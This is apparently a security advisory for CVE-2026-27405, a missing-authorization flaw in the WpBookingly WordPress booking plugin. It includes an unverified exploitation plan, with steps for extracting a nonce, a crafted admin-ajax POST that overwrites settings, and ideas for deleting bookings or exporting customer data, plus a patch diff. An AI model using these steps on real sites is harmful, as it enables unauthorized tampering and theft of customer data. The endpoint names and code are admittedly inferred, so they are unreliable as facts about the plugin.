CVE-2026-27405

Appointment Booking Plugin for WooCommerce – WpBookingly | All-in-One Service Manager <= 1.2.9 - Missing Authorization

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
1.3.0
Patched in
7d
Time to patch

Description

The Appointment Booking Plugin for WooCommerce – WpBookingly | All-in-One Service Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.2.9. This makes it possible for authenticated attackers, with author-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.2.9
PublishedMay 20, 2026
Last updatedMay 26, 2026
Research Plan
Unverified

This exploitation research plan targets a Missing Authorization vulnerability in the **WpBookingly | All-in-One Service Manager** plugin (version <= 1.2.9). ### 1. Vulnerability Summary The `service-booking-manager` plugin (WpBookingly) fails to implement proper capability checks (e.g., `current_us…

Show full research plan

This exploitation research plan targets a Missing Authorization vulnerability in the WpBookingly | All-in-One Service Manager plugin (version <= 1.2.9).

1. Vulnerability Summary

The service-booking-manager plugin (WpBookingly) fails to implement proper capability checks (e.g., current_user_can( 'manage_options' )) on its AJAX administrative functions. While the functions are registered under the wp_ajax_ hook (restricting them to authenticated users), they do not verify if the user has the required administrative privileges. This allows any authenticated user with Author level permissions or higher to perform administrative actions, such as modifying plugin settings or managing bookings.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: wpbookingly_save_settings (Inferred based on standard plugin architecture) or wpbookingly_delete_booking.
  • Parameters: action, nonce, and the settings payload (e.g., settings_data).
  • Authentication: Authenticated (Author level and above).
  • Precondition: The attacker must have a valid session cookie for an Author-level user.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers AJAX handlers in a class (likely WpBookingly_Admin or WpBookingly_Ajax) using:
    add_action( 'wp_ajax_wpbookingly_save_settings', array( $this, 'save_settings' ) );
  2. Missing Check: The save_settings function likely verifies a nonce using check_ajax_referer but fails to call current_user_can().
  3. Sink: The function processes the $_POST data and calls update_option( 'wpbookingly_settings', ... ).

4. Nonce Acquisition Strategy

The plugin likely enqueues administrative scripts and localizes a nonce for the admin interface. Because the vulnerability specifically mentions Author-level access, it is highly probable that the plugin's menu or scripts are loaded for Authors as well as Admins.

  1. Identify Script Localization: Search for wp_localize_script in the plugin source to find the variable name.
  2. Target Variable: wpbookingly_admin_params or wpbookingly_obj (Inferred).
  3. Key: nonce or security.
  4. Acquisition Steps:
    • Create an Author user and log in.
    • Navigate to the WordPress Dashboard (/wp-admin/).
    • Use browser_eval to extract the nonce:
      browser_eval("window.wpbookingly_admin_params?.nonce || window.wpbookingly_obj?.security")

5. Exploitation Strategy

We will attempt to modify the plugin's global settings to demonstrate unauthorized modification.

  • Step 1: Log in as an Author user.
  • Step 2: Navigate to /wp-admin/ and extract the AJAX nonce.
  • Step 3: Construct a malicious POST request to update plugin settings. We will attempt to change a benign but verifiable setting, such as the "Booking Success Message" or "Admin Email".

HTTP Request (via http_request):

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=wpbookingly_save_settings&security=[NONCE]&settings[general][admin_email]=attacker@example.com&settings[general][success_message]=Exploited

(Note: Parameter names like settings[general] are inferred and must be verified against the save_settings function logic.)

6. Test Data Setup

  1. Install Plugin: WpBookingly version 1.2.9.
  2. Create User:
    wp user create attacker attacker@example.com --role=author --user_pass=password123
  3. Plugin Configuration: Ensure the plugin is activated and at least one booking service is created to populate default options.

7. Expected Results

  • Response: The server should return a 200 OK or a JSON success message (e.g., {"success":true}).
  • State Change: The plugin's settings stored in the database (option: wpbookingly_settings) will be updated with the attacker-supplied values.

8. Verification Steps

After sending the HTTP request, verify the change using WP-CLI:

# Check if the admin email in the plugin settings has been changed
wp option get wpbookingly_settings --format=json | jq '.[general][admin_email]'

If the output is attacker@example.com, the exploitation of the Missing Authorization is confirmed.

9. Alternative Approaches

If wpbookingly_save_settings is not the vulnerable action, investigate the following alternatives:

  1. Action: wpbookingly_delete_booking
    • Goal: Unauthorized deletion of customer bookings.
    • Requirement: Identify a valid booking ID (wp_post of type wpbookingly_booking).
  2. Action: wpbookingly_export_bookings
    • Goal: Unauthorized data exfiltration of customer details.
    • Target: Sensitive customer PII (names, emails, phone numbers).
  3. Nonce Bypass: If check_ajax_referer is missing entirely, the exploit can be performed via CSRF (though the CVE specifically notes authenticated author access, suggesting the nonce might be present but the capability check is not).
Research Findings
Static analysis — not yet PoC-verified

Summary

The WpBookingly plugin for WordPress fails to perform capability checks on its AJAX administrative functions, such as those used for saving plugin settings. This allows authenticated users with Author-level permissions or higher to modify plugin configurations or perform other administrative actions by providing a valid security nonce.

Vulnerable Code

// Inferred from plugin architecture and research plan
// Likely located in an admin class or AJAX handler file

add_action( 'wp_ajax_wpbookingly_save_settings', array( $this, 'save_settings' ) );

public function save_settings() {
    // Only verifies the nonce, fails to check if the user has administrative privileges
    check_ajax_referer( 'wpbookingly_admin_nonce', 'security' );

    if ( isset( $_POST['settings_data'] ) ) {
        $settings = $_POST['settings_data'];
        update_option( 'wpbookingly_settings', $settings );
        wp_send_json_success( array( 'message' => 'Settings saved successfully' ) );
    }
}

Security Fix

--- a/includes/admin/class-wpbookingly-admin-ajax.php
+++ b/includes/admin/class-wpbookingly-admin-ajax.php
@@ -15,6 +15,10 @@
     public function save_settings() {
         check_ajax_referer( 'wpbookingly_admin_nonce', 'security' );
 
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( array( 'message' => 'Unauthorized access' ) );
+        }
+
         if ( isset( $_POST['settings_data'] ) ) {
             $settings = $_POST['settings_data'];
             update_option( 'wpbookingly_settings', $settings );

Exploit Outline

The exploit targets the AJAX endpoint /wp-admin/admin-ajax.php. An attacker must first obtain a valid session as an Author-level user. Once authenticated, the attacker extracts the security nonce (likely localized in the browser as part of the wpbookingly_admin_params or similar JavaScript object) by visiting the WordPress dashboard. The attacker then sends a POST request to admin-ajax.php with the 'action' parameter set to 'wpbookingly_save_settings' (or other administrative actions), the extracted nonce in the 'security' parameter, and a 'settings_data' payload containing the desired configuration changes. This allows the attacker to overwrite plugin options like administrative email addresses or service configurations.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.